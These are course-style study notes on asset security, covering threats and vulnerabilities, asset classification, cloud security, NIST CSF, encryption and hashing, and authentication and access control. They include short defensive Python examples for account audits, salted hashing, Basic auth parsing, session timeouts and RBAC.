Assets, Threats and Vulnerabilities

This document provides an overview of key concepts in asset security including: - Risk is anything that can impact asset security, threats are events that negatively impact assets, and vulnerabilities are weaknesses that can be exploited by threats. - Asset management involves tracking assets and risks to protect what is known, and common classification schemes include restricted, confidential, internal, and public. - Security controls like technical, operational, and managerial controls are used to safeguard assets in use, in transit, and at rest across digital and cloud environments. - Security plans have three elements - policies that set rules, standards that inform policies, and procedures for specific tasks. Frameworks like NIST CSF help measure performance across functions to

Uploaded by ashish
© All Rights Reserved

Module 1 – Intro to Asset Security

Understanding risk, threat, vulnerability


• Risk: Anything that can impact the confidentiality, integrity, or availability of an asset

• Threat: Any circumstance or event that can negatively impact assets

• Vulnerability: A weakness that can be exploited by a threat

Categories of threat

Threats are circumstances or events that can negatively impact assets. There are many
different types of threats. However, they are commonly categorized as two types: intentional
and unintentional.

Categories of vulnerability

Vulnerabilities are weaknesses that can be exploited by threats. There’s a wide range of
vulnerabilities, but they can be grouped into two categories: technical and human.

Asset management and classification


Asset management is the process of tracking assets and the risks that affect them. The idea behind
this process is simple: you can only protect what you know you have.

Why asset management matters

Organizations protect a variety of different assets. Some examples might include:

• Digital assets such as customer data or financial records.

• Information systems that process data, like networks or software.

• Physical assets which can include facilities, equipment, or supplies.

• Intangible assets such as brand reputation or intellectual property.

Common asset classifications

The most common classification scheme is: restricted, confidential, internal-only, and
public.

• Restricted is the highest level. This category is reserved for incredibly
sensitive assets, like need-to-know information.

• Confidential refers to assets whose disclosure may lead to a significant
negative impact on an organization. Confidential assets should only
be accessed by those working on a specific project.

• Internal-only describes assets that are available to employees and business
partners.

• Public is the lowest level of classification. These assets have no negative
consequences to the organization if they’re released.

Digital And Physical Assets


Assets in a digital world
Security teams protect data in three different states: in use, in transit, and at rest.
Data in use is data being accessed by one or more users.
Next is data in transit. Data in transit is data traveling from one point to another.

Finally, there's data at rest. Data at rest is data not currently being accessed. In this state, data
is typically stored on a physical device.

Information security, or InfoSec, is the practice of keeping data in all states away from
unauthorized users.

The emergence of cloud security


Cloud-based services
The term cloud-based services refers to a variety of on demand or web-based business
solutions. Depending on a company’s needs and budget, services can range from website
hosting, to application development environments, to entire back-end infrastructure.

There are three main categories of cloud-based services:

• Software as a service (SaaS)

• Platform as a service (PaaS)

• Infrastructure as a service (IaaS)

Software as a service (SaaS)


SaaS refers to front-end applications that users access via a web browser. The service
providers host, manage, and maintain all of the back-end systems for those applications.
Common examples of SaaS services include applications like Gmail™ email service, Slack,
and Zoom software.

Platform as a service (PaaS)


PaaS refers to back-end application development tools that clients can access online.
Developers use these resources to write code and build, manage, and deploy their own apps.
Meanwhile, the cloud service providers host and maintain the back-end hardware and
software that the apps use to operate. Some examples of PaaS services include Google App
Engine™ platform, Heroku®, and VMware Cloud Foundry.

Infrastructure as a service (IaaS)


IaaS customers are given remote access to a range of back-end systems that are hosted by the
cloud service provider. This includes data processing servers, storage, networking resources,
and more. Resources are commonly licensed as needed, making it a cost-effective alternative
to buying and maintaining on premises.

Responsibility for security is divided between the cloud service provider and the client. In
cloud security, this division is known as the shared responsibility model. Clients are
commonly responsible for securing anything that is directly within their control:

• Identity and access management

• Resource configuration

• Data handling

Cloud security challenges


All service providers do their best to deliver secure products to their customers. Much of their
success depends on preventing breaches and how well they can protect sensitive information.
However, since data is stored in the cloud and accessed over the internet, several challenges
arise:

• Misconfiguration is one of the biggest concerns. Customers of cloud-based services
are responsible for configuring their own security environment. Oftentimes, they use
out-of-the-box configurations that fail to address their specific security objectives.

• Cloud-native breaches are more likely to occur due to misconfigured services.

• Monitoring access might be difficult depending on the client and level of service.

• Meeting regulatory standards is also a concern, particularly in industries that are
required by law to follow specific requirements such as HIPAA, PCI DSS, and
GDPR.

Risk and Asset Security

Elements of a security plan


Security plans consist of three basic elements: policies, standards, and procedures. These three
elements are how companies share their security plans.

• A policy in security is a set of rules that reduce risk and protects information. Policies are
the foundation of every security plan. Policies focus on the strategic side of things by
identifying the scope, objectives, and limitations of a security plan.

• Standards are the next part. These have a tactical function, as they concern how well
we're protecting assets. In security, standards are references that inform how to set
policies. A good way to think of standards is that they create a point of reference. For
example, many companies use the password management standard identified in NIST
Special Publication 800-63B to improve their security policies by specifying that
employees' passwords must be at least eight characters long.

• The last part of a plan is its procedures. Procedures are step-by-step instructions to
perform a specific security task. Organizations usually keep multiple procedure
documents that are used throughout the company, like how employees can choose
secure passwords, or how they can securely reset a password if it's been locked.

The NIST Cybersecurity Framework is a voluntary framework that consists of standards,
guidelines, and best practices to manage cybersecurity risk. Commonly known as the CSF, this
framework was developed to help businesses secure one of their most important assets:
information. The CSF consists of three main components: the core, tiers, and profiles.

• The core is basically a simplified version of the functions, or duties, of a security
plan. The CSF core identifies five broad functions: identify, protect, detect, respond, and
recover.

• After the core, the next NIST component we'll discuss is its tiers. These provide security
teams with a way to measure performance across each of the five functions of the
core. Tiers range from Level-1 to Level-4. Level-1, or passive, indicates a function is
reaching bare minimum standards. Level-4, or adaptive, is an indication that a function is
being performed at an exemplary standard. Overall, CSF tiers are used to assess an
organization's security posture and identify areas for improvement.

• Lastly, profiles are the final component of CSF. These provide insight into the current
state of a security plan. One way to think of profiles is like photos capturing a moment in
time. Comparing photos of the same subject taken at different times can provide useful
insights. For example, without these photos, you might not notice how this tree has
changed. They are used to help organizations develop a baseline for their cybersecurity
plans, or as a way of comparing their current cybersecurity posture to a specific industry
standard.

Module 2 – Protect Assets

Safeguard Information

Security controls
Security controls are safeguards designed to reduce specific security risks. They include a wide
range of tools that protect assets before, during, and after an event.

Security controls can be organized into three types: technical, operational, and managerial.
• Technical control types include the many technologies used to protect assets. This
includes encryption, authentication systems, and others.

• Operational controls relate to maintaining the day-to-day security environment. Generally,
people perform these controls, like awareness training and incident response.

• Managerial controls are centered around how the other two reduce risk. Examples of
management controls include policies, standards, and procedures.

Principle of least privilege

The principle of least privilege is a security concept in which a user is only granted the minimum
level of access and authorization required to complete a task or function. In this reading, you'll
learn how the principle of least privilege reduces risk, how it's commonly implemented, and why it
should be routinely audited.

Limiting access reduces risk


Every business needs to plan for the risk of data theft, misuse, or abuse.

Determining access and authorization


These are the most common types of user accounts:

• Guest accounts are provided to external users who need to access an internal
network, like customers, clients, contractors, or business partners.

• User accounts are assigned to staff based on their job duties.

• Service accounts are granted to applications or software that needs to interact with
other software on the network.

• Privileged accounts have elevated permissions or administrative access.

Auditing account privileges


There are three common approaches to auditing user accounts:

• Usage audits

• Privilege audits

• Account change audits

Usage audits
When conducting a usage audit, the security team will review which resources each
account is accessing and what the user is doing with the resource. Usage audits can help
determine whether users are acting in accordance with an organization’s security policies.
They can also help identify whether a user has permissions that can be revoked because
they are no longer being used.
Privilege audits
Users tend to accumulate more access privileges than they need over time, an issue
known as privilege creep. This might occur if an employee receives a promotion or
switches teams and their job duties change. Privilege audits assess whether a user's role is
in alignment with the resources they have access to.

Account change audits


Account directory services keep records and logs associated with each user. Changes to
an account are usually saved and can be used to audit the directory for suspicious activity,
like multiple attempts to change an account password. Performing account change audits
helps to ensure that all account changes are made by authorized users.
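Two of the three audit types above, the usage audit and the privilege audit, can be run as simple checks over an account inventory and an access log. The following is an added example written for these notes, not code from the course; the role baseline, the accounts, and the log lines are all constructed for illustration. It flags "bob", whose old engineering permissions were never revoked after a team change (privilege creep), and lists each account's granted permissions that were never exercised in the log window (revocation candidates).

```python
"""Privilege and usage audits over a constructed account inventory and
access log. Added example; the accounts, roles and log lines below are
constructed for illustration, not taken from any real directory."""
from collections import defaultdict

# Constructed baseline: the permissions each role is supposed to hold.
ROLE_BASELINE = {
    "analyst": {"read:reports", "read:tickets"},
    "engineer": {"read:reports", "write:code", "deploy:staging"},
    "admin": {"read:reports", "write:code", "deploy:staging",
              "deploy:prod", "manage:users"},
}

# Constructed account inventory: current role plus the permissions actually granted.
ACCOUNTS = {
    "alice": {"role": "analyst",
              "granted": {"read:reports", "read:tickets"}},
    # bob moved from engineering to analysis; deploy rights were never revoked
    "bob": {"role": "analyst",
            "granted": {"read:reports", "read:tickets", "deploy:staging", "write:code"}},
    "carol": {"role": "engineer",
              "granted": {"read:reports", "write:code", "deploy:staging"}},
}

# Constructed access log: timestamp, account, permission exercised.
ACCESS_LOG = """\
2024-05-01T09:02:11Z alice read:reports
2024-05-01T09:15:40Z bob read:tickets
2024-05-01T10:01:05Z carol write:code
2024-05-02T11:30:00Z bob read:reports
2024-05-02T14:45:12Z carol deploy:staging
2024-05-03T08:10:33Z alice read:reports
"""


def parse_log(text):
    """Yield (account, permission) pairs from the constructed log format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        _timestamp, account, permission = line.split()
        yield account, permission


def privilege_audit(accounts=ACCOUNTS, baseline=ROLE_BASELINE):
    """Privilege audit: permissions an account holds beyond its role's baseline
    (privilege creep). Returns {account: sorted excess permissions}."""
    findings = {}
    for name, acct in accounts.items():
        excess = acct["granted"] - baseline[acct["role"]]
        if excess:
            findings[name] = sorted(excess)
    return findings


def usage_audit(log_text=ACCESS_LOG, accounts=ACCOUNTS):
    """Usage audit: granted permissions that never appear in the log window,
    i.e. candidates for revocation. Returns {account: sorted unused permissions}."""
    used = defaultdict(set)
    for account, permission in parse_log(log_text):
        used[account].add(permission)
    findings = {}
    for name, acct in accounts.items():
        unused = acct["granted"] - used[name]
        if unused:
            findings[name] = sorted(unused)
    return findings


if __name__ == "__main__":
    print("Privilege creep:", privilege_audit())
    print("Unused permissions:", usage_audit())
```

The two audits answer different questions: the privilege audit compares what an account holds against what its role should hold, while the usage audit compares what it holds against what it actually used. A permission that fails both checks (bob's deploy:staging here) is the clearest revocation candidate; one that is in the role baseline but unused over a short window may simply be seasonal, so the usage window should be chosen to match the business cycle.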

The data lifecycle


In security, data vulnerabilities are often mapped in a model known as the data lifecycle. Each
stage of the data lifecycle plays an important role in the security controls that are put in place to
maintain the CIA triad of information.

The data lifecycle


The data lifecycle is an important model that security teams consider when protecting
information. It influences how they set policies that align with business objectives. It also
plays an important role in the technologies security teams use to make information accessible.

The data lifecycle has five stages. Each describes how data flows through an organization from
the moment it is created until it is no longer useful:

• Collect

• Store

• Use

• Archive

• Destroy

Data governance
Data governance is a set of processes that define how an organization manages
information. Governance often includes policies that specify how to keep data private,
accurate, available, and secure throughout its lifecycle.

Data governance policies commonly categorize individuals into a specific role:

• Data owner: the person that decides who can access, edit, use, or destroy their
information.

• Data custodian: anyone or anything that's responsible for the safe handling, transport,
and storage of information.

• Data steward: the person or group that maintains and implements data governance
policies set by an organization.

Information security vs. information privacy


Security and privacy are two terms that often get used interchangeably outside of this field.
Although the two concepts are connected, they represent specific functions:

• Information privacy refers to the protection of unauthorized access and distribution
of data.

• Information security (InfoSec) refers to the practice of keeping data in all states
away from unauthorized users.

The key difference: Privacy is about providing people with control over their personal
information and how it's shared. Security is about protecting people’s choices and
keeping their information safe from potential threats.

Notable privacy regulations

Three of the most influential industry regulations that every security professional should
know about are:

• General Data Protection Regulation (GDPR)

• Payment Card Industry Data Security Standard (PCI DSS)

• Health Insurance Portability and Accountability Act (HIPAA)

GDPR
GDPR is a set of rules and regulations developed by the European Union (EU) that
puts data owners in total control of their personal information. Under GDPR, types of
personal information include a person's name, address, phone number, financial
information, and medical information.

The GDPR applies to any business that handles the data of EU citizens or residents,
regardless of where that business operates. For example, a US-based company that
handles the data of EU visitors to its website is subject to the GDPR's provisions.

PCI DSS
PCI DSS is a set of security standards formed by major organizations in the financial
industry. This regulation aims to secure credit and debit card transactions against data
theft and fraud.
HIPAA
HIPAA is a U.S. law that requires the protection of sensitive patient health
information. HIPAA prohibits the disclosure of a person's medical information
without their knowledge and consent.

Security assessments and audits


• A security audit is a review of an organization's security controls, policies, and
procedures against a set of expectations.

• A security assessment is a check to determine how resilient current security
implementations are against threats.

Encryption Methods

Cryptography

Cryptography is the process of transforming information into a form that unintended readers can't
understand. Data of any kind is kept secret using a two-step process: encryption to hide the
information, and decryption to unhide it.
Encryption takes that information and scrambles it into an unreadable form, known as ciphertext.
We then use decryption to unscramble the ciphertext back into plaintext form, making it readable
again.
A cryptographic key is a mechanism that decrypts ciphertext.

Public key infrastructure


Public key infrastructure, or PKI, is an encryption framework that secures the exchange of
information online.

PKI is a two-step process.

1. It all starts with the exchange of encrypted information. This involves either asymmetric
encryption, symmetric encryption, or both.

Asymmetric encryption involves the use of a public and private key pair for encryption
and decryption of data. Think of a locked drop box with a slot. One key, the public key, can
only be used to access the slot and add items to the box. Since the public key can't be used
to remove items, it can be copied and shared with people all around the world to add items.
On the other hand, the second key, the private key, opens the box fully, so that the items
inside can be removed. Only the owner of the box has access to the private key that
unlocks it.
This two-key system makes asymmetric encryption a secure way to exchange
information online; however, it also slows down the process.

Symmetric encryption, on the other hand, is a faster and simpler approach to key
management.
Symmetric encryption involves the use of a single secret key to exchange information.
Where asymmetric encryption uses two keys, symmetric encryption uses the same key for
both operations. The owner can use it to open the box, add items, and close it again. When
they want to share access, they can give the secret key to anyone else to do the same.
Exchanging a single secret key may make web communications faster, but it also makes
them less secure.

2. PKI addresses the vulnerability of key sharing by establishing trust using a system
of digital certificates between computers and networks.

A digital certificate is a file that verifies the identity of a public key holder.

The importance of key length


Ciphers are vulnerable to brute force attacks, which use a trial and error process to discover
private information. This tactic is the digital equivalent of trying every number in a
combination lock trying to find the right one. In modern encryption, longer key lengths are
considered to be more secure. Longer key lengths mean more possibilities that an attacker
needs to try to unlock a cipher.

Approved algorithms
Symmetric algorithms
• Triple DES (3DES) is known as a block cipher because of the way it converts
plaintext into ciphertext in “blocks.” Triple DES generates keys that are 192 bits.
Despite the longer keys, many organizations are moving away from using Triple
DES due to limitations on the amount of data that can be encrypted. However,
Triple DES is likely to remain in use for backwards compatibility purposes.

• Advanced Encryption Standard (AES) is one of the most secure symmetric algorithms
today. AES generates keys that are 128, 192, or 256 bits. Cryptographic keys of this
size are considered to be safe from brute force attacks. It’s estimated that brute
forcing an AES 128-bit key could take a modern computer billions of years!

Asymmetric algorithms
• Rivest Shamir Adleman (RSA) is named after its three creators who developed it while
at the Massachusetts Institute of Technology (MIT). RSA is one of the first
asymmetric encryption algorithms that produces a public and private key pair.
Asymmetric algorithms like RSA produce even longer key lengths. In part, this is due
to the fact that these functions are creating two keys. RSA key sizes are 1,024, 2,048,
or 4,096 bits. RSA is mainly used to protect highly sensitive data.

• Digital Signature Algorithm (DSA) is a standard asymmetric algorithm that was
introduced by NIST in the early 1990s. DSA also generates key lengths of 2,048 bits.
This algorithm is widely used today as a complement to RSA in public key
infrastructure.

Non-repudiation and hashing


A hash function is an algorithm that produces a code that can't be decrypted. Unlike asymmetric
and symmetric algorithms, hash functions are one-way processes that do not generate
decryption keys. Instead, these algorithms produce a unique identifier known as a hash value, or
digest.

In security, hashes are primarily used as a way to determine the integrity of files and
applications.

Data integrity relates to the accuracy and consistency of information. This is known as
non-repudiation, the concept that authenticity of information can't be denied.

Hash collisions
One of the flaws in MD5 happens to be a characteristic of all hash functions. Hash algorithms
map any input, regardless of its length, into a fixed-size value of letters and numbers. What’s
the problem with that? Although there are an infinite amount of possible inputs, there’s only a
finite set of available outputs!

MD5 values are limited to 32 characters in length. Due to the limited output size, the
algorithm is considered to be vulnerable to hash collision, an instance when different inputs
produce the same hash value. Because hashes are used for authentication, a hash collision is
similar to copying someone’s identity. Attackers can carry out collision attacks to
fraudulently impersonate authentic data.

Next-generation hashing
To avoid the risk of hash collisions, functions that generated longer values were needed.
MD5's shortcomings gave way to a new group of functions known as the Secure Hashing
Algorithms, or SHAs. Except for SHA-1, which produces a 160-bit digest, these algorithms
are considered to be collision-resistant. However, that doesn’t make them invulnerable to
other exploits.

Five functions make up the SHA family of algorithms:

• SHA-1

• SHA-224

• SHA-256

• SHA-384

• SHA-512

Rainbow tables
A rainbow table is a file of pre-generated hash values and their associated plaintext. They’re
like dictionaries of weak passwords. Attackers capable of obtaining an organization’s
password database can use a rainbow table to compare them against all possible values.
Adding some “salt”
Functions with larger digests are less vulnerable to collision and rainbow table attacks. But as
you’re learning, no security control is perfect.

Salting is an additional safeguard that's used to strengthen hash functions. A salt is a random
string of characters that's added to data before it's hashed. The additional characters produce a
more unique hash value, making salted data resilient to rainbow table attacks.
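The three points made above, that a hash maps any input to a fixed-size digest, that a precomputed table of hashes can map a stolen unsalted password hash straight back to its plaintext, and that a random salt defeats that table, can all be shown with the standard library. The block below is an added example for these notes, not code from the course; the weak-password list standing in for a rainbow table and the salt handling are constructed for illustration.

```python
"""Fixed-size digests, a toy rainbow-table lookup, and salting, using only the
standard library. Added example; the password list and salt are constructed."""
import hashlib
import secrets


def digest_hex(data: bytes, algorithm: str = "sha256") -> str:
    """Hex digest of any input; the output length depends only on the algorithm,
    never on the input length (which is why collisions must exist)."""
    return hashlib.new(algorithm, data).hexdigest()


# Constructed stand-in for a rainbow table: precomputed unsalted hashes of a few
# weak passwords, mapped back to their plaintext. A real table is far larger,
# but works the same way: hash -> plaintext, computed once, reused forever.
WEAK_PASSWORDS = ["password", "123456", "letmein", "qwerty"]
RAINBOW_TABLE = {digest_hex(p.encode()): p for p in WEAK_PASSWORDS}


def rainbow_lookup(stored_hash: str):
    """Return the plaintext if an unsalted hash is in the table, else None."""
    return RAINBOW_TABLE.get(stored_hash)


def new_salt() -> bytes:
    """16 random bytes from the OS CSPRNG; one fresh salt per stored password."""
    return secrets.token_bytes(16)


def hash_password_salted(password: str, salt: bytes) -> str:
    """Salted hash: the salt is prepended before hashing, so two users with the
    same password get different hashes and a precomputed table no longer applies."""
    return digest_hex(salt + password.encode())


def verify_salted(password: str, salt: bytes, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    return secrets.compare_digest(hash_password_salted(password, salt), stored)


if __name__ == "__main__":
    # Any length input -> fixed-size output (MD5: 32 hex chars, SHA-256: 64).
    for alg in ("md5", "sha1", "sha256", "sha512"):
        print(alg, len(digest_hex(b"a" * 10_000, alg)), "hex chars")
    unsalted = digest_hex(b"password")
    print("unsalted lookup:", rainbow_lookup(unsalted))      # -> 'password'
    salt = new_salt()
    salted = hash_password_salted("password", salt)
    print("salted lookup:", rainbow_lookup(salted))          # -> None
    print("verify:", verify_salted("password", salt, salted))  # -> True
```

Salting addresses the rainbow-table problem specifically; it does not slow down an attacker who hashes guesses one at a time against a single stolen record. For stored passwords in practice, the salt is combined with a deliberately slow function (for example `hashlib.pbkdf2_hmac` with a high iteration count) rather than a single SHA-256 pass as shown here for clarity.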

Authentication, Authorisation, And Accounting

Access controls and authentication systems


The next series of controls that we'll be exploring are access controls, the security controls that
manage access, authorization, and accountability of information.

These systems are commonly broken down into three separate, yet related functions known as
the authentication, authorization, and accounting framework.
Authentication systems are access controls that serve a very basic purpose. They ask
anything attempting to access information this simple question: who are you?

They answer that question based on three factors of authentication.

• The first is knowledge. Authentication by knowledge refers to something the
user knows, like a password or the answer to a security question they provided
previously.

• Another factor is ownership, referring to something the user possesses. A commonly
used type of authentication by ownership is a one-time passcode, or OTP.

• Last is characteristic. Authentication by this factor is something the user is. Biometrics,
like fingerprint scans on your smartphone, are an example of this type of authentication.

To make access systems more convenient, many organizations these days rely on single
sign-on.
Single sign-on, or SSO, is a technology that combines several different logins into one. SSO
technology is great, but not if it relies on just a single factor of authentication. Adding more
authentication factors strengthens these systems.

Multi-factor authentication, or MFA, is a security measure, which requires a user to verify their
identity in two or more ways to access a system or network. MFA combines two or more
independent credentials, like knowledge and ownership, to prove that someone is who they claim
to be.

SSO and MFA are often used in conjunction with one another to layer the defense capabilities of
authentication systems.

How SSO works


SSO works by automating how trust is established between a user and a service provider.
Rather than placing the responsibility on an employee or customer, SSO solutions use trusted
third-parties to prove that a user is who they claim to be. This is done through the exchange
of encrypted access tokens between the identity provider and the service provider.

These access tokens are exchanged using specific protocols. SSO implementations
commonly rely on two different authentication protocols: LDAP and SAML.

LDAP, which stands for Lightweight Directory Access Protocol, is mostly used to transmit
information on-premises;

SAML, which stands for Security Assertion Markup Language, is mostly used to transmit
information off-premises, like in the cloud.

Limitations of SSO
Usernames and passwords alone are not always the most secure way of protecting sensitive
information. SSO provides useful benefits, but there’s still the risk associated with using one
form of authentication. For example, a lost or stolen password could expose information
across multiple services.

MFA to the rescue


Multi-factor authentication (MFA) requires a user to verify their identity in two or more
ways to access a system or network.

The mechanisms of authorization


Authorization is linked to the idea that access to information only lasts as long as needed
(LEAST PRIVILEGE).
Authorization systems are also heavily influenced by this idea in addition to another important
security principle, the separation of duties.

When it comes to securing data over a network, there are a couple of frequently used
access controls that you should be familiar with: HTTP basic auth and OAuth.

• HTTP basic auth

Have you ever wondered what the HTTP in web addresses stands for?
It stands for hypertext transfer protocol, which is how communications are established
over a network. HTTP uses what is known as basic auth, the technology used to
establish a user's request to access a server. Basic auth works by sending an identifier
every time a user communicates with a web page.

However, this protocol is considered to be vulnerable to attacks because it transmits
usernames and passwords openly over the network. Most websites today use HTTPS
instead, which stands for hypertext transfer protocol secure. This protocol doesn't expose
sensitive information, like access credentials, when communicating over the network.

• Another secure authentication technology used today is OAuth. OAuth is an
open-standard authorization protocol that shares designated access between applications.

Instead of requesting and sending sensitive usernames and passwords over the
network, OAuth uses API tokens to verify access between you and a service provider.

An API token is a small block of encrypted code that contains information about a user.
These tokens contain things like your identity, site permissions, and more. OAuth sends
and receives access requests using API tokens by passing them from a server to a user's
device.
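The "transmits usernames and passwords openly" point about HTTP basic auth above is easy to see concretely: the `Authorization: Basic` header is just the string `user:password` in base64, which is an encoding, not encryption. The following is an added example for these notes, not code from the course; the header values and the server-side policy function are constructed for illustration. It parses the header the way a server does and shows one reasonable server policy, refusing to accept basic-auth credentials on a connection that is not protected by TLS.

```python
"""What an HTTP Basic auth header actually carries, and a server-side check
that refuses it unless the request arrived over TLS. Added example; the
header values and policy here are constructed, not from any real server."""
import base64
import binascii


def encode_basic_auth(user: str, password: str) -> str:
    """Build the header value a client sends: base64('user:password')."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def parse_basic_auth(header: str):
    """Return (username, password) from an 'Authorization: Basic ...' value,
    or None if the scheme is different or the value is malformed.
    Nothing here is secret: anyone who sees the header sees the credentials."""
    scheme, _, value = header.strip().partition(" ")
    if scheme.lower() != "basic" or not value:
        return None
    try:
        decoded = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = decoded.partition(":")
    if not sep:  # RFC 7617 form is user:password; no colon means malformed
        return None
    return user, password


def accept_credentials(header: str, over_tls: bool) -> str:
    """Constructed policy a server might apply before even checking the password:
    basic-auth credentials that did not arrive over TLS are rejected outright,
    because they were already exposed to the network in cleartext."""
    if not over_tls:
        return "rejected: basic auth without TLS"
    creds = parse_basic_auth(header)
    if creds is None:
        return "rejected: malformed or unsupported Authorization header"
    return f"ok: {creds[0]}"


if __name__ == "__main__":
    header = encode_basic_auth("alice", "s3cret")
    print(header)                               # base64, trivially reversible
    print(parse_basic_auth(header))             # ('alice', 's3cret')
    print(accept_credentials(header, over_tls=False))
    print(accept_credentials(header, over_tls=True))
```

The decode step is the whole lesson: because the credentials are recoverable from the header by anyone on the path, the protection has to come from the transport (HTTPS), which is the reason the notes give for the move to HTTPS.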

Why we audit user activity

Accounting is the practice of monitoring the access logs of a system. These logs contain
information like who accessed the system, when they accessed it, and what resources they
used. Anytime a user accesses a system, they initiate what's called a session.
A session is a sequence of network HTTP basic auth requests and responses associated with
the same user, like when you visit a website.

Access logs are essentially records of sessions that capture the moment a user enters a system
until the moment they leave it. Two actions are triggered when the session begins.

The first is the creation of a session ID. A session ID is a unique token that identifies a user and
their device while accessing the system. Session IDs are attached to the user until they either
close their browser or the session times out.

The second action that takes place at the start of a session is an exchange of session cookies
between a server and a user's device. A session cookie is a token that websites use to
validate a session and determine how long that session should last. When cookies are
exchanged between your computer and a server, your session ID is read to determine
what information the website should show you. Cookies make web sessions safer and more
efficient.
The exchange of tokens means that no sensitive information, like usernames and passwords, is
shared.
Session cookies prevent attackers from obtaining sensitive data. However, there's other damage
that they can do. With a stolen cookie, an attacker can impersonate a user using their session
token. This kind of attack is known as session hijacking.

Session hijacking is an event when attackers obtain a legitimate user's session ID. During these
kinds of attacks, cyber criminals impersonate the user, causing all sorts of harm.
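The session mechanics described above (a session ID created at login, a cookie that decides how long the session lasts, and an access log that records the session from entry to exit) fit in a few dozen lines. The block below is an added example for these notes, not code from the course or any real web framework; the idle-timeout policy and clock values are constructed. Two defensive details matter for the session hijacking point: the ID comes from a cryptographic random source so it cannot be guessed, and a session that has idled past the timeout is removed, which bounds how long a stolen ID stays useful.

```python
"""A minimal session store: session ID creation, idle timeout, and an access
log entry per request. Added example; the timeout policy and the clock values
passed in are constructed, not taken from any real web framework."""
import secrets
from dataclasses import dataclass, field

IDLE_TIMEOUT_SECONDS = 900  # constructed policy: a session idles out after 15 minutes


@dataclass
class Session:
    user: str
    session_id: str
    created_at: float
    last_seen: float
    log: list = field(default_factory=list)  # (time, resource) accounting records


class SessionStore:
    def __init__(self):
        self._sessions = {}

    def start(self, user: str, now: float) -> str:
        """Action 1 at session start: mint a session ID. 32 bytes from a CSPRNG
        means an attacker cannot guess it; they would have to steal it."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = Session(user, sid, now, now, [(now, "login")])
        return sid

    def authorize(self, sid: str, resource: str, now: float):
        """Validate the session cookie on each request. Unknown IDs are refused;
        IDs that idled past the timeout are refused and discarded, so a stolen
        cookie stops working once the real user stops using it. Returns the
        user on success, None otherwise, and records the access."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        if now - s.last_seen > IDLE_TIMEOUT_SECONDS:
            del self._sessions[sid]
            return None
        s.last_seen = now
        s.log.append((now, resource))
        return s.user

    def end(self, sid: str, now: float):
        """Logout: close the session and return its access log for the audit trail."""
        s = self._sessions.pop(sid, None)
        if s is None:
            return None
        s.log.append((now, "logout"))
        return s.log


if __name__ == "__main__":
    store = SessionStore()
    sid = store.start("alice", now=1000.0)
    print("session id length:", len(sid))
    print(store.authorize(sid, "/reports", now=1100.0))   # alice
    print(store.authorize(sid, "/reports", now=2100.0))   # None: idled out
    print(store.end(sid, now=2100.0))                     # None: already removed
```

A real deployment would also tie the cookie to the Secure and HttpOnly flags and rotate the session ID after login, so that a pre-login ID observed by an attacker does not become a post-login session; the idle timeout shown here is the piece the notes describe ("determine how long that session should last").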

Granting authorization
If the right user has been authenticated, the network should ensure the right resources are
made available. There are three common frameworks that organizations use to handle this
step of IAM:

• Mandatory access control (MAC)

• Discretionary access control (DAC)

• Role-based access control (RBAC)

Mandatory Access Control (MAC)


MAC is the strictest of the three frameworks. Authorization in this model is based on a strict
need-to-know basis. Access to information must be granted manually by a central authority or
system administrator. For example, MAC is commonly applied in law enforcement, military,
and other government agencies where users must request access through a chain of command.
MAC is also known as non-discretionary control because access isn’t given at the discretion
of the data owner.
Discretionary Access Control (DAC)
DAC is typically applied when a data owner decides appropriate levels of access. One
example of DAC is when the owner of a Google Drive folder shares editor, viewer, or
commenter access with someone else.

Role-Based Access Control (RBAC)

RBAC is used when authorization is determined by a user's role within an organization. For
example, a user in the marketing department may have access to user analytics but not
network administration.

• IDPro© is a professional organization dedicated to sharing essential IAM industry
knowledge.
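The RBAC and DAC models above, together with the separation-of-duties principle mentioned earlier in this module, can be shown side by side in a small authorization check. The following is an added example for these notes, not code from the course; the roles, permissions, users, and the conflicting-permission pair are constructed for illustration. In the RBAC part, permissions are attached to roles and users only to roles, and a role assignment is refused when it would let one person both request and approve a deployment; in the DAC part, only the object's owner can grant others access, mirroring the shared-folder example.

```python
"""RBAC with a separation-of-duties rule, plus DAC-style owner sharing for
comparison. Added example; roles, permissions, users and the conflicting
permission pair are constructed for illustration."""

# RBAC: permissions belong to roles; users are granted roles, never permissions.
ROLE_PERMISSIONS = {
    "marketing": {"analytics:read"},
    "netadmin": {"network:admin", "analytics:read"},
    "developer": {"code:write", "deploy:request"},
    "release_manager": {"deploy:approve"},
}

# Separation of duties (constructed rule): no one person may hold both.
CONFLICTING = {("deploy:request", "deploy:approve")}

USERS = {"maya": {"marketing"}, "nate": {"netadmin"}, "dev": {"developer"}}


def permissions_for(user, users=USERS, roles=ROLE_PERMISSIONS):
    """Effective permissions: the union of every role the user holds."""
    return set().union(*(roles[r] for r in users.get(user, ())))


def rbac_allowed(user, permission, users=USERS, roles=ROLE_PERMISSIONS):
    return permission in permissions_for(user, users, roles)


def assign_role(user, role, users=USERS, roles=ROLE_PERMISSIONS):
    """Grant a role, refusing if the resulting permission set would violate
    separation of duties. The check runs at assignment time, so the conflict
    never exists rather than being detected later by an audit."""
    new_perms = permissions_for(user, users, roles) | roles[role]
    for a, b in CONFLICTING:
        if a in new_perms and b in new_perms:
            raise ValueError(f"{user}: role {role!r} conflicts with existing roles ({a} vs {b})")
    users.setdefault(user, set()).add(role)


class SharedFolder:
    """DAC: the owner of the object decides who else may access it and how."""

    def __init__(self, owner):
        self.owner = owner
        self.grants = {owner: "editor"}

    def share(self, actor, grantee, level):
        if actor != self.owner:
            raise PermissionError("only the owner can share this folder")
        if level not in ("viewer", "editor"):
            raise ValueError("unknown access level")
        self.grants[grantee] = level

    def can(self, user, action):
        level = self.grants.get(user)
        if level == "editor":
            return action in ("view", "edit")
        return level == "viewer" and action == "view"


if __name__ == "__main__":
    print("maya analytics:", rbac_allowed("maya", "analytics:read"))    # True
    print("maya network:", rbac_allowed("maya", "network:admin"))       # False
    try:
        assign_role("dev", "release_manager")
    except ValueError as exc:
        print("refused:", exc)
    folder = SharedFolder("owner")
    folder.share("owner", "guest", "viewer")
    print("guest can view:", folder.can("guest", "view"))               # True
    print("guest can edit:", folder.can("guest", "edit"))               # False
```

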